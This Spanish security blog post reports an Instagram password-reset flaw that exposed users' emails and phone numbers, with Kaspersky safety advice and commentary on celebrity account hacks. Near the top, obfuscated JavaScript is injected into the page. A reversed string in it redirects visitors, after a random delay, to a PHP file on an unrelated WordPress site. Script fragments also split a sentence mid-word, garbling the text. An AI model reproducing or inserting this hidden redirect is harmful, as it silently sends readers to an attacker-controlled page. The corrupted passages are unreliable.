FALLO EN INSTAGRAM PROVOCA EL HACKEO MASIVO DE CUENTAS
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tok=gYnWASGd” width=”651″ height=”400″ /></p>
<p>Tal como reportó Instagram el pasado miércoles, los cibercriminales explotaron un error de la red social que les permitió robar perfiles de usuarios de Instagram, incluyendo celebridades. Los investigadores de Kaspersky detectaron el error, lo notificaron el martes 29 de agos<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to y compartieron un breve análisis técnico con esta red social.
Los investigadores descubrieron que la vulnerabilidad existe en la versión móvil 8.5.1 de Instagram, lanzada en 2016 (la versión actual es 12.0.0). El proceso de ataque es relativamente simple: usando la aplicación obsoleta, el atacante selecciona la opción de restauración de contraseña y captura la solicitud mediante un proxy web. Entonces seleccionan a una víctima y envían una solicitud al servidor de Instagram cargando el identificador o el nombre de usuario exclusivo del objetivo. El servidor devuelve una respuesta en formato JSON con la información personal de la víctima, incluyendo datos confidenciales, como el correo electrónico y el número de teléfono.
Los ataques resultan bastante laboriosos: cada uno debe hacerse manualmente, ya que Instagram utiliza cálculos matemáticos para evitar que los atacantes automaticen el formulario de solicitud.
Los hackers fueron vistos en un foro clandestino, intercambiando credenciales personales por perfiles de celebridades en la red social.
“Es muy importante que los usuarios de redes sociales usen todos los recursos de seguridad ofrecidos por las plataformas en su beneficio, a fin de que no resulte fácil realizar ataques como este. Las funciones como la doble autenticación, las alertas de inicio de sesión desconocidas, el uso de contraseñas únicas, y mantener las aplicaciones de redes sociales siempre actualizadas son buenas prácticas y recomendaciones para todos “, afirma Dmitry Bestuzhev, Director del Equipo de Investigación y Análisis para Kaspersky Lab América Latina.
Kaspersky Lab aconseja que los usuarios que estén utilizando versiones antiguas del software las actualicen inmediatamente a la última versión disponible. Otros consejos útiles para mantenerse seguros en redes sociales incluyen el uso de direcciones de correo electrónico diferentes para distintas plataformas sociales, reporten cualquier inquietud o irregularidad que observen en la red social. Y, sobre todo: si reciben correos electrónicos sobre una restauración de contraseña que no ha iniciado, alerte de inmediato a la red social.
Ver información original al respecto en Fuente
ver mas info :
Ser víctima de un hackeo no es plato de buen gusto para nadie, seas o no famoso. La información que guardan tus apps pueden quedar expuesta, por no hablar de que los piratas informáticos son capaces de hacerse con el control de los datos de tu teléfono. Ya no solo hablamos de caer en una campaña de phishing, donde tus cuentas bancarias quedan vulneradas. También se trata de la privacidad de los usuarios, que se ve comprometida hasta que se arreglen los errores.
Seguramente muchos famosos se están llevando las manos a la cabeza en estos momentos ya que un fallo en Instagram provoca el hackeo de sus terminales. De momento, se ha sabido que Selena Gómez, la que fue novia del cantante Justin Bieber, ha sido una de las víctimas de este error. El resultado ha sido que su cuenta de la red social se ha visto comprometida, así como las fotos de su terminal y otros archivos.
Según apunta The Verge, desde la red social a cargo de Facebook ya se ha informado de que la brecha se ha reparado, pero algunas cuentas de celebrities se han visto afectadas. Para ellos se ha recomendado cautela con su actividad en redes así como la recepción de llamadas telefónicas.
¿Es sencillo hackear una cuenta de Instagram?
El error de Instagram que ha facilitado el hackeo de los móviles de los famosos está relacionado con su API. Se trata de un programa que conecta la red social fotográfica con otras apps como Facebook, por ejemplo. ¿Ya habrás visto la importancia de la seguridad de este hilo no?. Efectivamente, si un pirata informático encuentra un hueco tiene acceso a toda la red de programas conectados y puede hacer un verdadero destrozo. Pero la realidad es que no es tan sencillo hackear Instagram.
Como recordatorio, el año pasado se dio por cerrado el escándalo del Celebgate, donde un pirata informático robó fotos privadas de algunas famosas y las publicó en Internet. Finalmente, Ryan Collins, autor del delito, fue condenado a 18 meses de cárcel.
Fuente de esta ultima información
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.